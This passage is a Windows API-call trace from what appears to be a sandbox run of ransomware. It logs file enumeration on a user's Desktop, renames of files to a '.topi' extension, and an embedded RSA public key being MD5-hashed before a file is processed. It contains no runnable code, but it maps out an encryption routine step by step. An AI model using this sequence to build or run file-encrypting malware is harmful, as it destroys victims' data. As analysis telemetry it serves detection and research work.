lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.590] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.590] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.590] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.590] CloseHandle (hObject=0x6a8) returned 1 [0094.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0094.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.591] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pA5hO5i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pa5ho5i.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pA5hO5i.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pa5ho5i.wav.topi")) returned 1 [0094.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.592] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.593] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fe380, ftCreationTime.dwHighDateTime=0x1d5c112, ftLastAccessTime.dwLowDateTime=0xca41c340, ftLastAccessTime.dwHighDateTime=0x1d5c4e5, ftLastWriteTime.dwLowDateTime=0xca41c340, ftLastWriteTime.dwHighDateTime=0x1d5c4e5, nFileSizeHigh=0x0, nFileSizeLow=0x69a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pOX7h1T6RlrYuJGtjF_U.png", cAlternateFileName="POX7H1~1.PNG")) returned 1 [0094.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.593] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.593] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.593] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pOX7h1T6RlrYuJGtjF_U.png") returned=".png" [0094.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pOX7h1T6RlrYuJGtjF_U.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pox7h1t6rlryujgtjf_u.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.593] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=27048) returned 1 [0094.593] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.596] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6982, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.596] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.597] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.597] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x69a8, lpOverlapped=0x0) returned 1 [0094.597] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.597] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.597] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.597] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.597] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.598] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.598] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.598] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.598] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.598] GetLastError () returned 0x0 [0094.599] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.599] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.599] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.599] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.599] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x69b0) returned 0x99f52d8 [0094.599] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3c88 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90c0 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3cd0 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90d8 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9108 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9120 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.600] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9108 | out: hHeap=0x680000) returned 1 [0094.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9120 | out: hHeap=0x680000) returned 1 [0094.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9120 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9108 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9120 | out: hHeap=0x680000) returned 1 [0094.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9108 | out: hHeap=0x680000) returned 1 [0094.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.601] GetCurrentThreadId () returned 0x8c4 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1d30 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.602] GetCurrentThreadId () returned 0x8c4 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.602] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9108 [0094.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9120 [0094.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90f0 [0094.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9138 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9108 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9108 [0094.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9108 | out: hHeap=0x680000) returned 1 [0094.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9138 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9120 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90f0 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90d8 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3cd0 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 